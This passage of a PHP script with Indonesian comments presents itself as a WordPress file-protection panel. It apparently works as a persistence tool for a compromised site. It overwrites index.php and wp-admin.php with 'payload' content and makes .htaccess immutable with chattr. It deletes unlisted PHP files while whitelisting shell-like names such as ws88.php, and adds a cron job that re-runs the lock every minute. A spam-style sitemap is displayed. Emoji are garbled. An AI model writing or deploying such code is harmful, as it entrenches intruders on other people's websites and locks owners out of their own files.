"βββββββββββββββββββββββββββββββββββββββββ\n"; echo "β Ancestor directories processed\n\n"; // BAGIAN 2: LOCK DESCENDANT DIRECTORIES echo "π BAGIAN 2: Lock Descendant Directories (sub-direktori dalam script location)\n"; echo "βββββββββββββββββββββββββββββββββββββββββ\n"; $descendantResult = lockDescendantDirectoriesOnly_Safe($scriptDir, $excludeDirs); $stats['descendant_locked'] = $descendantResult['locked']; $stats['excluded'] += $descendantResult['excluded']; $stats['errors'] += $descendantResult['errors']; echo "βββββββββββββββββββββββββββββββββββββββββ\n"; echo "β Descendant directories processed\n"; echo "\nπ RINGKASAN CHMOD 555:\n"; echo "βββββββββββββββββββββββββββββββ\n"; echo "β Ancestor locked: " . str_pad($stats['ancestor_locked'], 4) . " β\n"; echo "β Descendant locked: " . str_pad($stats['descendant_locked'], 3) . " β\n"; echo "β Excluded (safe): " . str_pad($stats['excluded'], 6) . " β\n"; echo "β Errors: " . str_pad($stats['errors'], 18) . " β\n"; echo "βββββββββββββββββββββββββββββββ\n"; return $stats; } /** * Lock sub-direktori secara rekursif HANYA di dalam targetDirectory */ function lockDescendantDirectoriesOnly_Safe(string $targetDirectory, array $excludeDirs = []): array { $stats = [ 'locked' => 0, 'excluded' => 0, 'errors' => 0 ]; if (!is_dir($targetDirectory)) { return $stats; } try { $directoryIterator = new RecursiveDirectoryIterator( $targetDirectory, RecursiveDirectoryIterator::SKIP_DOTS ); $iterator = new RecursiveIteratorIterator( $directoryIterator, RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $item) { try { $path = $item->getPathname(); if (!$item->isDir()) { continue; } $isExcluded = false; foreach ($excludeDirs as $excludeDir) { if (str_starts_with($path, rtrim($excludeDir, '/'))) { $isExcluded = true; break; } } if ($isExcluded) { @chmod($path, 0755); $stats['excluded']++; } else { $result = @chmod($path, 0555); if ($result) { $stats['locked']++; } else { $stats['errors']++; } } if (($stats['locked'] + $stats['excluded']) % 100 === 0) { @clearstatcache(); } } catch (\Throwable $e) { $stats['errors']++; continue; } } } catch (\Exception $e) { $stats['errors']++; } return $stats; } // ================================================================ // === βββ FUNSI: LOCK HTACCESS ROOT KE 555 === // ================================================================ /** * Mengunci file .htaccess di root menjadi 0555 (read-only) * Dipanggil SETELAH .htaccess ditulis/di-update */ function lockRootHtaccessTo555(string $htaccessPath): bool { if (!file_exists($htaccessPath)) { echo "β .htaccess tidak ditemukan, skip lock\n"; return false; } try { // Jika exec tersedia, hapus immutable attribute dulu (jika ada) if (can_exec()) { safe_exec("chattr -i " . escapeshellarg($htaccessPath) . " 2>/dev/null"); } // Lock ke 0555 (read-only) $result = @chmod($htaccessPath, 0555); @clearstatcache(true, $htaccessPath); if ($result) { echo " π ROOT HTACCESS LOCKED: {$htaccessPath} β 0555 (PROTECTED!)\n"; // Optional: Tambahkan immutable attribute jika exec tersedia if (can_exec()) { safe_exec("chattr +i " . escapeshellarg($htaccessPath) . " 2>/dev/null"); } return true; } else { echo " β Gagal lock .htaccess root ke 0555\n"; return false; } } catch (\Throwable $e) { echo " β Error locking .htaccess: " . $e->getMessage() . "\n"; return false; } } /** * Unlock .htaccess root dari 0555 ke 0644 (bisa ditulis lagi) * Digunakan hanya di mode UNLOCK ALL */ function unlockRootHtaccess(string $htaccessPath): bool { if (!file_exists($htaccessPath)) { return false; } try { // Hapus immutable attribute jika ada if (can_exec()) { safe_exec("chattr -i " . escapeshellarg($htaccessPath) . " 2>/dev/null"); } // Ubah ke 0644 (writable) $result = @chmod($htaccessPath, 0644); @clearstatcache(true, $htaccessPath); if ($result) { echo " π ROOT HTACCESS UNLOCKED: {$htaccessPath} β 0644 (writable)\n"; return true; } return false; } catch (\Throwable $e) { return false; } } // ================================================================ // === LOCK REKURSIF SEMUA FOLDER (ORIGINAL) === // ================================================================ function recursiveLockFoldersOnly_Safe(string $directory, array $excludeDirs = []): array { $stats = [ 'folders_locked' => 0, 'folders_excluded' => 0, 'errors' => 0 ]; if (!is_dir($directory)) { return $stats; } try { $directoryIterator = new RecursiveDirectoryIterator( $directory, RecursiveDirectoryIterator::SKIP_DOTS ); $iterator = new RecursiveIteratorIterator( $directoryIterator, RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $item) { try { $path = $item->getPathname(); if (!$item->isDir()) { continue; } $isExcluded = false; foreach ($excludeDirs as $excludeDir) { if (str_starts_with($path, $excludeDir)) { $isExcluded = true; break; } } if ($isExcluded) { @chmod($path, 0755); $stats['folders_excluded']++; } else { $result = @chmod($path, 0555); if ($result) { $stats['folders_locked']++; } else { $stats['errors']++; } } if (($stats['folders_locked'] + $stats['folders_excluded']) % 100 === 0) { @clearstatcache(); } } catch (\Throwable $e) { $stats['errors']++; continue; } } } catch (\Exception $e) { $stats['errors']++; } return $stats; } // ================================================================ // === UNLOCK REKURSIF: HANYA FOLDER (NO EXEC) === // ================================================================ function recursiveUnlockFoldersOnly_Safe(string $directory): array { $stats = [ 'folders_unlocked' => 0, 'errors' => 0 ]; if (!is_dir($directory)) { return $stats; } try { $directoryIterator = new RecursiveDirectoryIterator( $directory, RecursiveDirectoryIterator::SKIP_DOTS ); $iterator = new RecursiveIteratorIterator( $directoryIterator, RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $item) { try { $path = $item->getPathname(); if (!$item->isDir()) { continue; } if (can_exec()) { safe_exec("chattr -i " . escapeshellarg($path) . " 2>/dev/null"); } $result = @chmod($path, 0755); if ($result) { $stats['folders_unlocked']++; } else { $stats['errors']++; } if ($stats['folders_unlocked'] % 100 === 0) { @clearstatcache(); } } catch (\Throwable $e) { $stats['errors']++; continue; } } } catch (\Exception $e) { $stats['errors']++; } @chmod($directory, 0755); $stats['folders_unlocked']++; return $stats; } function lockBaseDirectorySafe(string $baseDir): bool { try { $result1 = @chmod($baseDir, 0555); $wpAdminDir = $baseDir . '/wp-admin'; if (is_dir($wpAdminDir)) { @chmod($wpAdminDir, 0755); } if (str_starts_with(__FILE__, $baseDir)) { @chmod(__FILE__, 0644); } return $result1; } catch (\Throwable $e) { return false; } } function superLockFilesSafe(string $baseDir, array $allowedFiles, array $safeFiles): void { $coreTargets = [ $baseDir . '/.htaccess', $baseDir . '/wp-admin/.htaccess', $baseDir . '/wp-admin/wp-admin.php', $baseDir . '/index.php' ]; foreach ($allowedFiles as $file) { $filePath = $baseDir . '/' . $file . '.php'; if (!file_exists($filePath)) { @touch($filePath); @file_put_contents($filePath, "<?php // silence is golden ?>"); } $coreTargets[] = $filePath; } foreach ($coreTargets as $target) { if (!file_exists($target)) continue; $isSafe = false; foreach ($safeFiles as $safeFile) { if ($target === $safeFile || str_starts_with($target, $safeFile)) { $isSafe = true; break; } } if (str_contains($target, '/wp-admin/')) { $isSafe = true; } if ($isSafe) { @chmod($target, 0644); // β οΈ INI MENGUBAH HTACCESS KE 0644! } else { @chmod($target, 0555); if (can_exec()) { safe_exec("chattr +i " . escapeshellarg($target) . " 2>/dev/null"); } } } } function unlockSuperFilesSafe(string $baseDir, array $allowedFiles, array $safeFiles): void { $coreTargets = [ $baseDir . '/.htaccess', $baseDir . '/wp-admin/.htaccess', $baseDir . '/wp-admin/wp-admin.php', $baseDir . '/index.php' ]; foreach ($allowedFiles as $file) { $coreTargets[] = $baseDir . '/' . $file . '.php'; } foreach ($coreTargets as $target) { if (!file_exists($target)) continue; if (can_exec()) { safe_exec("chattr -i " . escapeshellarg($target) . " 2>/dev/null"); } @chmod($target, 0644); // β οΈ INI JUGA MENGUBAH HTACCESS KE 0644! } } function setupAutoCronSafe(string $currentUrl): void { if (!can_exec()) { return; } try { $crontabPath = safe_exec("which crontab") ?: '/usr/bin/crontab'; $cronCommand = "* * * * * /usr/bin/curl -s " . escapeshellarg($currentUrl . "?update=both_locked") . " >/dev/null 2>&1"; $currentCron = safe_shell_exec("$crontabPath -l 2>/dev/null") ?: ''; if (str_contains($currentCron, $currentUrl)) { return; } $newCron = trim($currentCron . "\n" . $cronCommand); $tempFile = sys_get_temp_dir() . '/crontab_' . getmypid() . '.txt'; if (@file_put_contents($tempFile, $newCron) !== false) { safe_exec("$crontabPath " . escapeshellarg($tempFile)); @unlink($tempFile); } } catch (\Throwable $e) {} } function removeAutoCronSafe(string $currentUrl): void { if (!can_exec()) { return; } try { $crontabPath = safe_exec("which crontab") ?: '/usr/bin/crontab'; $currentCron = safe_shell_exec("$crontabPath -l 2>/dev/null"); if ($currentCron === null || !str_contains($currentCron, $currentUrl)) { return; } $lines = explode("\n", $currentCron); $newLines = []; foreach ($lines as $line) { if (!str_contains($line, $currentUrl)) { $newLines[] = $line; } } $tempFile = sys_get_temp_dir() . '/crontab_' . getmypid() . '.txt'; if (@file_put_contents($tempFile, implode("\n", array_filter($newLines))) !== false) { safe_exec("$crontabPath " . escapeshellarg($tempFile)); @unlink($tempFile); } } catch (\Throwable $e) {} } function autoGenerateRobotsSafe(string $domain, string $protocol): bool { try { $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => "{$protocol}://{$domain}/robots", CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 20, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_USERAGENT => 'Mozilla/5.0 (Compatible)' ]); $response = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($response !== false && $httpCode === 200) { $robotsPath = rtrim($_SERVER['DOCUMENT_ROOT'], '/') . '/robots.txt'; return file_exists($robotsPath); } } catch (\Throwable $e) {} return false; } function displaySxallsitemapSafe(string $domain, string $protocol): void { echo "<div style='margin-top:20px;padding:18px;background:#f8f9fa;border:2px solid #007bff;border-radius:10px;font-family:Arial,sans-serif'>"; echo "<h3 style='color:#007bff;margin:0 0 12px 0'>πΊοΈ SITEMAP</h3>"; echo "<p style='margin:0 0 10px 0'>URL: <a href='{$protocol}://{$domain}/sxallsitemap.xml' target='_blank' style='color:#007bff;text-decoration:none;font-weight:bold'>{$protocol}://{$domain}/sxallsitemap.xml</a></p>"; try { $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => "{$protocol}://{$domain}/sxallsitemap.xml", CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 15, CURLOPT_SSL_VERIFYPEER => false ]); $response = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($response !== false && $httpCode === 200) { echo "<pre style='font-size:12px;white-space:pre-wrap;max-height:250px;overflow-y:auto;background:#fff;padding:12px;border-radius:6px;border:1px solid #ddd'>" . htmlspecialchars(substr($response, 0, 2000)) . (strlen($response) > 2000 ? "\n... (truncated)" : "") . "</pre>"; } else { echo "<p style='color:#dc3545;margin:0'>β Gagal load sitemap (HTTP: $httpCode)</p>"; } } catch (\Throwable $e) { echo "<p style='color:#dc3545;margin:0'>β Error: " . htmlspecialchars($e->getMessage()) . "</p>"; } echo "</div>"; } // ================================================================ // === CLEANUP AGRESIF (NO EXEC) === // ================================================================ function cleanup_php_root_safe($baseDir = null): int { if (empty($baseDir)) { $baseDir = rtrim($_SERVER['DOCUMENT_ROOT'], '/'); } $core_wp_files = [ 'index.php', 'wp-config.php', 'wp-activate.php', 'wp-blog-header.php', 'wp-comments-post.php', 'wp-cron.php', 'wp-links-opml.php', 'wp-load.php', 'wp-login.php', 'wp-mail.php', 'wp-settings.php', 'wp-signup.php', 'wp-trackback.php', 'xmlrpc.php' ]; $custom_whitelist = [ 'ah88.php', 'lm15.php', 'ws88.php', 'tx88.php', 'tx33.php', 'webindex.php', 'wordfence-waf.php', 'webindexORI.php', 'ws77.php', 'ww10.php', 'zz8.php', 'tx77.php', 'wp-admin.php', 'bngzepjrndfkpjbdefault.php', 'lsjaybvgybhhpbjdefault.php', 'lsjaybvgybhhpbjmas.php' ]; $allowed_non_php = [ 'robots.txt', '.htaccess', '.user.ini', 'php.ini', 'license.txt', 'readme.html', 'wp-config-sample.php', 'favicon.ico', 'web.config' ]; $whitelist = array_map('strtolower', array_merge($core_wp_files, $custom_whitelist, $allowed_non_php)); $dangerous_ext = ['php0', 'phps', 'phtml', 'php4', 'php5', 'php7', 'phar']; $archive_ext = ['gz', 'zip', 'tar', 'rar', '7z', 'bz2']; $backup_ext = ['bak', 'old', 'orig', 'save', 'dist', '~']; $suspicious_ext = array_merge($dangerous_ext, $archive_ext, $backup_ext); $deleted = 0; @chmod($baseDir, 0755); $files = glob($baseDir . '/*'); if (empty($files)) { $files = []; if ($handle = @opendir($baseDir)) { while (($entry = readdir($handle)) !== false) { if ($entry !== '.' && $entry !== '..') { $files[] = $baseDir . '/' . $entry; } } closedir($handle); } } foreach ($files as $file) { if (!is_file($file)) continue; $base_name = basename($file); $base_name_lower = strtolower($base_name); $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION) ?: ''); if (in_array($base_name_lower, $whitelist)) { continue; } if ($file === __FILE__) { continue; } if (str_starts_with($base_name, '.') && in_array($base_name_lower, ['.htaccess', '.user.ini'])) { continue; } if (str_starts_with($base_name, '.')) { continue; } $should_delete = false; $reason = ''; if ($ext === 'php' && !in_array($base_name_lower, $whitelist)) { $should_delete = true; $reason = 'PHP tidak di-whitelist'; } if (in_array($ext, $dangerous_ext)) { $should_delete = true; $reason = 'Ekstensi berbahaya (.' . $ext . ')'; } if (in_array($ext, $archive_ext)) { $should_delete = true; $reason = 'File arsip (.' . $ext . ')'; } if (in_array($ext, $backup_ext)) { $should_delete = true; $reason = 'File backup (.' . $ext . ')'; } if ($should_delete) { @chmod($file, 0777); if (@unlink($file)) { $deleted++; echo " β {$base_name} ({$reason})\n"; continue; } $tmp = $file . '.del_' . uniqid(); if (@rename($file, $tmp)) { @chmod($tmp, 0777); if (@unlink($tmp)) { $deleted++; echo " β {$base_name} ({$reason})\n"; continue; } } if (can_exec()) { safe_exec("rm -f " . escapeshellarg($file) . " 2>/dev/null"); if (!file_exists($file)) { $deleted++; echo " β {$base_name} ({$reason}) [exec]\n"; continue; } } echo " β {$base_name} (GAGAL HAPUS)\n"; } } return $deleted; } // ================================================================ // === PAYLOAD === // ================================================================ $wpAdminContent = $payloadWpAdminContent; $indexContent = $payloadIndexContent; $domain = $_SERVER['HTTP_HOST'] ?? 'domain.com'; $protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http'; $scriptUrl = $protocol . "://" . $domain . $_SERVER['PHP_SELF']; // ================================================================================= // === UI & ROUTING === // ================================================================================= $actionRequested = isset($_GET['update']) || $isFix || $isUnlock; if (!$actionRequested) { $phpVersion = phpversion(); $isPhp8 = version_compare($phpVersion, '8.0.0', '>='); $execAvailable = can_exec(); echo "<!DOCTYPE html> <html lang='id'> <head> <meta charset='UTF-8'> <meta name='viewport' content='width=device-width, initial-scale=1.0'> <title>Kontrol Proteksi File - PHP {$phpVersion}</title> <style> *{box-sizing:border-box;margin:0;padding:0} body{font-family:-apple-system,BlinkMacSystemFont,'Segoe UI',Roboto,sans-serif;background:linear-gradient(135deg,#667eea 0%,#764ba2 100%);min-height:100vh;display:flex;align-items:center;justify-content:center;padding:20px} .container{background:#fff;max-width:900px;width:100%;padding:35px;border-radius:20px;box-shadow:0 25px 80px rgba(0,0,0,0.25)} h1{text-align:center;color:#2c3e50;font-size:26px;margin-bottom:5px} .version-badge{display:inline-block;background:" . ($isPhp8 ? '#00b894' : '#0984e3') . ";color:#fff;padding:4px 14px;border-radius:20px;font-size:11px;font-weight:bold;margin-left:8px;vertical-align:middle} .subtitle{text-align:center;color:#7f8c8d;font-size:13px;margin-bottom:25px} .alert{padding:16px;border-radius:10px;margin-bottom:20px;font-size:13px;line-height:1.6} .alert-success{background:#d4edda;color:#155724;border-left:5px solid #28a745} .alert-info{background:#d1ecf1;color:#0c5460;border-left:5px solid #17a2b8} .alert-warning{background:#fff3cd;color:#856404;border-left:5px solid #ffc107} .btn-group{display:flex;flex-wrap:wrap;gap:12px;justify-content:center;margin:22px 0} .btn{padding:14px 26px;border-radius:10px;text-decoration:none;font-weight:600;font-size:13px;transition:all 0.3s ease;box-shadow:0 4px 12px rgba(0,0,0,0.15);display:inline-block;min-width:200px;text-align:center} .btn:hover{transform:translateY(-3px);box-shadow:0 8px 24px rgba(0,0,0,0.22)} .btn-lock{background:linear-gradient(135deg,#f093fb 0%,#f5576c 100%);color:#fff} .btn-opts{background:linear-gradient(135deg,#4facfe 0%,#00f2fe 100%);color:#fff} .btn-upd{background:linear-gradient(135deg,#43e97b 0%,#38f9d7 100%);color:#2c3e50} .btn-wpa{background:linear-gradient(135deg,#fa709a 0%,#fee140 100%);color:#2c3e50} .btn-fix{background:linear-gradient(135deg,#a8edea 0%,#fed6e3 100%);color:#2c3e50} .btn-unlock{background:linear-gradient(135deg,#ff6b6b 0%,#ee5a24 100%);color:#fff;border:3px solid #c0392b;animation:pulse 2s infinite} .btn-unlock:hover{transform:translateY(-3px) scale(1.04)} @keyframes pulse{0%,100%{box-shadow:0 0 0 0 rgba(220,53,69,0.6)}50%{box-shadow:0 0 0 15px rgba(220,53,69,0)} table{width:100%;border-collapse:collapse;margin:18px 0;font-size:12px;box-shadow:0 3px 12px rgba(0,0,0,0.08);border-radius:8px;overflow:hidden} th,td{padding:12px 14px;text-align:left;border-bottom:1px solid #eee} th{background:linear-gradient(135deg,#667eea 0%,#764ba2 100%);color:#fff;font-weight:600} tr:hover{background:#f8f9f9} code{background:rgba(102,126,234,0.12);padding:2px 8px;border-radius:4px;font-size:11px;color:#667eea;font-weight:600} .info-box{background:#f8f9fa;padding:20px;border-radius:12px;margin-top:22px;border:1px solid #e9ecef} .info-box h3{margin:0 0 12px 0;color:#2c3e50;font-size:15px;border-bottom:2px solid #dee2e6;padding-bottom:8px} .info-box ul{padding-left:20px} .info-box li{margin-bottom:8px;line-height:1.5;color:#495057} .badge-new{background:#dc3545;color:#fff;padding:3px 10px;border-radius:12px;font-size:10px;font-weight:bold;margin-left:6px;vertical-align:middle} .checkmark{color:#28a745;margin-right:5px} .crossmark{color:#dc3545;margin-right:5px} .lock-icon{color:#dc3545} .unlock-icon{color:#28a745} .htaccess-badge{background:linear-gradient(135deg,#fd79a8 0%,#e84393 100%)} .final-lock-badge{background:linear-gradient(135deg,#ff6b6b 0%,#ee5a24 100%);animation:glow 2s infinite} @keyframes glow{ 0%,100%{box-shadow:0 0 5px rgba(255,107,107,0.5)} 50%{box-shadow:0 0 20px rgba(255,107,107,0.8)} } </style> </head> <body> <div class='container'> <h1>π‘οΈ Kontrol Proteksi File <span class='version-badge'>PHP {$phpVersion}" . ($isPhp8 ? ' β' : '') . "</span></h1> <p class='subtitle'>WordPress Auto-Protect v7.5 - <strong>FINAL LOCK HTACCESS MODE</strong></p> <div class='alert alert-success'> <strong><span class='checkmark'>β</span> Status:</strong><br> β’ <strong>.htaccess</strong> valid & terstruktur benar<br> β’ <strong>Cleanup AGRESIF:</strong> Hapus file .php yang tidak di-whitelist<br> β’ <strong>exec() disabled?</strong> <span style='color:" . ($execAvailable ? '#28a745' : '#dc3545') . ";font-weight:bold'>" . ($execAvailable ? 'TIDAK - exec tersedia' : 'YA - menggunakan fallback') . "</span><br><br> β’ <strong>π Lokasi Script:</strong> <code>{$currentScriptDir}</code><br> β’ <strong>π Chmod 555 Target:</strong> Hanya path script & sub-direktorinya<br> β’ <strong>π‘οΈ ROOT HTACCESS:</strong> <span class='htaccess-badge' style='color:white;padding:3px 10px;border-radius:12px;font-size:11px;font-weight:bold;'>OTOMATIS DI-LOCK 0555</span><br> β’ <strong>π₯ FINAL LOCK:</strong> <span class='final-lock-badge' style='color:white;padding:3px 10px;border-radius:12px;font-size:11px;font-weight:bold;'>DIJAMIN 0555 SAMPAI AKHIR!</span> </div>"; if (!$execAvailable) { echo " <div class='alert alert-warning'> <strong>β οΈ Catatan:</strong> Fungsi <code>exec()</code> dinonaktifkan server.<br> β’ <code>chattr</code> tidak akan digunakan (attribute lock skipped)<br> β’ Cron setup akan di-skip<br> β’ Semua operasi tetap berjalan normal tanpa exec </div>"; } echo " <div class='btn-group' style='border-bottom:2px solid #eee;padding-bottom:20px;margin-bottom:20px'> <a href='?update=both_locked' class='btn btn-lock'>π LOCK FOLDERS</a> <a href='?update=options' class='btn btn-opts'>βοΈ OPTIONS</a> <a href='?update=both_unlocked' class='btn btn-upd'>π UPDATE</a> <a href='?update=wpadmin' class='btn btn-wpa'>π WP-ADMIN</a> </div> <div class='btn-group'> <a href='?fix' class='btn btn-fix'>π§ FIX</a> <a href='?unlock' class='btn btn-unlock'>π UNLOCK ALL<span class='badge-new'>NEW</span></a> </div> <table> <tr> <th>Mode</th> <th>Chmod 555 Target</th> <th>Root .htaccess</th> <th>Final Lock</th> </tr> <tr style='background:#ffebee'> <td><strong>π LOCK/FIX/UPDATE</strong></td> <td>Hanya path script</td> <td><span class='lock-icon'><strong>β 0555 π</strong></span></td> <td><span class='final-lock-badge' style='color:white;padding:3px 8px;border-radius:6px;font-size:11px;'>β FINAL!</span></td> </tr> <tr style='background:#e8f5e9'> <td><strong>π UNLOCK</strong></td> <td colspan='3'><span class='unlock-icon'>SEMUA β 0755 / 0644</span></td> </tr> </table> <div class='info-box'> <h3>π Panduan Lengkap dengan Final Lock</h3> <ul> <li><strong>π Lock/Fix/Update:</strong> Update + Cleanup + Chmod 555 path script + Lock .htaccess + <strong>FINAL LOCK</strong></li> <li><strong>π Unlock:</strong> Semua folder β 0755 + Unlock .htaccess β 0644</li> </ul> <hr style='margin:15px 0;border:none;border-top:1px solid #dee2e6'> <strong style='color:#e84393'>π₯ FINAL LOCK MECHANISM:</strong> <ul style='margin-top:10px'> <li>Dipanggil di <strong>STEP PALING AKHIR</strong> setelah semua proses</li> <li>Memastikan .htaccess <strong>BENAR-BENAR 0555</strong> tidak berubah</li> <li>Mengatasi masalah perubahan permission oleh fungsi lain</li> </ul> </div> </div> </body></html>"; exit; } // ================================================================================= // === EKSEKUSI === // ================================================================================= echo "<div style='font-family:Arial,sans-serif;padding:20px;max-width:800px;margin:20px auto;border:1px solid #ddd;border-radius:12px;background:#fafafa'>"; echo "<h3 style='text-align:center;color:#2c3e50;margin-bottom:15px'>" . ($isUnlock ? "π UNLOCK ALL" : ($isFix ? "π§ FIX" : "π UPDATE")) . "</h3>"; echo "<pre style='background:#fff;padding:18px;border-radius:10px;font-size:12px;line-height:1.6;white-space:pre-wrap;overflow-x:auto;border:1px solid #eee'>"; try { // ======================================================================= // MODE UNLOCK (UNLOCK HTACCESS JUGA!) // ======================================================================= if ($isUnlock) { echo "π Mode: UNLOCK ALL FOLDERS\n"; echo "β° Start: " . date('H:i:s') . "\n\n"; forceRootDirPermission($baseDir); echo "β Root permissions set (0755)\n"; // UNLOCK HTACCESS ROOT KE 0644 echo "\nπ‘οΈ Unlocking ROOT .htaccess...\n"; unlockRootHtaccess($htaccess); foreach ($targetFiles as $file) { if (can_exec()) { safe_exec("chattr -i " . escapeshellarg($file) . " 2>/dev/null"); } @chmod($file, 0644); } echo "β Target files unlocked (including .htaccess β 0644)\n"; $result = recursiveUnlockFoldersOnly_Safe($baseDir); echo "β Folders unlocked: {$result['folders_unlocked']} (semua β 0755)\n"; unlockSuperFilesSafe($baseDir, $allowedFiles, $safeFiles); echo "β Super files unlocked\n"; removeAutoCronSafe($scriptUrl); if (!can_exec()) { echo "βΉ Cron skipped (exec disabled)\n"; } else { echo "β Cron removed\n"; } @chmod($baseDir, 0755); @chmod($currentScript, 0644); echo "β Final safety check done\n"; echo "\nβ DONE at " . date('H:i:s') . "\n"; echo "π All folders now: 0755 (Full Access)\n"; echo "π Root .htaccess now: 0644 (Writable)\n"; // ======================================================================= // MODE FIX (DENGAN SMART CHMOD 555 + LOCK HTACCESS + FINAL LOCK!) // ======================================================================= } elseif ($isFix) { echo "π§ Mode: FIX\n"; echo "π Script Location: {$currentScriptDir}\n"; echo "β° Start: " . date('H:i:s') . "\n\n"; foreach ($targetFiles as $file) { if (can_exec()) { safe_exec("chattr -i " . escapeshellarg($file) . " 2>/dev/null"); } @chmod($file, 0644); } @chmod($baseDir, 0755); echo "β Files unlocked\n"; perbaruiFile($wpAdminFile, $backupDir, $wpAdminContent, 'wp-admin.php'); perbaruiFile($indexFile, $backupDir, $indexContent, 'index.php'); // Tulis .htaccess baru paksaTulis($htaccess, $newHtaccess); paksaTulis($wpAdminHtaccess, $newWpAdminHtaccess); echo "β Files rebuilt (including .htaccess)\n"; // LOCK HTACCESS ROOT KE 555 echo "\nπ‘οΈ PROTECTING ROOT HTACCESS:\n"; echo "βββββββββββββββββββββββββββββββββ\n"; lockRootHtaccessTo555($htaccess); echo "βββββββββββββββββββββββββββββββββ\n"; forceRootDirPermission($baseDir); @chmod($currentScript, 0644); // SMART CHMOD 555: HANYA PATH SCRIPT! echo "\n" . str_repeat("β", 50) . "\n"; echo "π SMART CHMOD 555 MODE ACTIVATED\n"; echo str_repeat("β", 50) . "\n\n"; $chmodResult = chmodOnlyScriptPathTo555($baseDir, $currentScriptDir, $safeFolders); echo "\nβ Fix operations complete\n"; // Cleanup echo "\nπ§Ή Cleanup AGRESIF (root only):\n"; echo "βββββββββββββββββββββββββββββ\n"; $deletedCount = cleanup_php_root_safe($baseDir); echo "βββββββββββββββββββββββββββββ\n"; echo "π¦ Total dihapus: {$deletedCount} file\n"; // βββββ FINAL LOCK STEP (PALING AKHIR!) βββββ echo "\n" . str_repeat("β", 60) . "\n"; echo "π₯π₯π₯ FINAL LOCK STEP (PALING AKHIR!) π₯π₯π₯\n"; echo str_repeat("β", 60) . "\n"; echo "Memastikan .htaccess root BENAR-BENAR 0555...\n"; lockRootHtaccessTo555($htaccess); echo "β FINAL LOCK COMPLETE - .htaccess DIJAMIN 0555!\n"; echo str_repeat("β", 60) . "\n"; echo "\nββββββββββββββββββββββββββββββββββββββββββββ\n"; echo "β Status: FIX COMPLETE β\n"; echo "β Cleanup: {$deletedCount} deleted β\n"; echo "β Chmod 555: Path script only β\n"; echo "β Others: 0755 (unchanged) β\n"; echo "β π‘οΈ HTACCESS: 0555 (FINAL LOCKED!) β\n"; echo "ββββββββββββββββββββββββββββββββββββββββββββ\n"; // ======================================================================= // MODE UPDATE (DENGAN SMART CHMOD 555 + LOCK HTACCESS + FINAL LOCK!) // ======================================================================= } else { echo "π Mode: " . strtoupper($updateMode) . "\n"; echo "π Script Location: {$currentScriptDir}\n"; echo "β° Start: " . date('H:i:s') . "\n\n"; forceRootDirPermission($baseDir); echo "β Root OK (0755)\n"; perbaruiFile($wpAdminFile, $backupDir, $wpAdminContent, 'wp-admin.php'); if (in_array($updateMode, ['both_locked', 'both_unlocked'])) { perbaruiFile($indexFile, $backupDir, $indexContent, 'index.php'); } elseif ($updateMode === 'options') { perbaruiFile($indexFile, $backupDir, $wpAdminContent, 'index.php'); } // Tulis .htaccess baru paksaTulis($htaccess, $newHtaccess); paksaTulis($wpAdminHtaccess, $newWpAdminHtaccess); echo "β Core files updated (including .htaccess)\n"; // LOCK HTACCESS ROOT KE 555 echo "\nπ‘οΈ PROTECTING ROOT HTACCESS:\n"; echo "βββββββββββββββββββββββββββββββββ\n"; lockRootHtaccessTo555($htaccess); echo "βββββββββββββββββββββββββββββββββ\n"; foreach ([$wpAdminFile, $indexFile, $wpAdminHtaccess] as $file) { $isSafe = in_array($file, $safeFiles); if ($isSafe) { @chmod($file, 0644); } else { @chmod($file, 0555); } } echo "β Core files locked (safe mode)\n"; // SMART CHMOD 555: HANYA PATH SCRIPT! echo "\n" . str_repeat("β", 50) . "\n"; echo "π SMART CHMOD 555 MODE ACTIVATED\n"; echo str_repeat("β", 50) . "\n\n"; $chmodResult = chmodOnlyScriptPathTo555($baseDir, $currentScriptDir, $safeFolders); @chmod($currentScript, 0644); echo "β Safety check passed\n"; // Cleanup echo "\nπ§Ή Cleanup AGRESIF (root only):\n"; echo "βββββββββββββββββββββββββββββ\n"; $deletedCount = cleanup_php_root_safe($baseDir); echo "βββββββββββββββββββββββββββββ\n"; echo "π¦ Total dihapus: {$deletedCount} file\n"; $robotsGenerated = autoGenerateRobotsSafe($domain, $protocol); // Super lock files (ini MUNGKIN mengubah htaccess ke 0644!) superLockFilesSafe($baseDir, $allowedFiles, $safeFiles); echo "β Super lock applied\n"; // Setup cron setupAutoCronSafe($scriptUrl); if (can_exec()) { echo "β Cron active\n"; } else { echo "βΉ Cron skipped (no exec)\n"; } // βββββ FINAL LOCK STEP (PALING AKHIR!) βββββ // Ini akan MENIMPA perubahan apapun yang dilakukan fungsi di atas! echo "\n" . str_repeat("β", 60) . "\n"; echo "π₯π₯π₯ FINAL LOCK STEP (PALING AKHIR!) π₯π₯π₯\n"; echo str_repeat("β", 60) . "\n"; echo "Memastikan .htaccess root BENAR-BENAR 0555...\n"; echo "(Meskipun fungsi sebelumnya mengubahnya ke 0644)\n"; lockRootHtaccessTo555($htaccess); echo "β FINAL LOCK COMPLETE - .htaccess DIJAMIN 0555!\n"; echo str_repeat("β", 60) . "\n"; if (!$robotsGenerated && $retryCount < $maxRetries) { $newRetry = $retryCount + 1; echo "\nβ³ Retry ($newRetry/$maxRetries)..."; echo "<script>setTimeout(()=>window.location.href='?retry=$newRetry',3000)</script>"; echo "</pre></div>"; exit; } echo "\nπ <a href='{$protocol}://{$domain}/sxallsitemap.xml' target='_blank' style='color:#007bff'>Sitemap</a>\n"; displaySxallsitemapSafe($domain, $protocol); echo "\nββββββββββββββββββββββββββββββββββββββββββββ\n"; echo "β Status: LOCKED (SMART MODE + FINAL LOCK) β\n"; echo "β Path script: 0555 π β\n"; echo "β Root + siblings: 0755 β β\n"; echo "β Cleanup: {$deletedCount} deleted β\n"; echo "β π‘οΈ 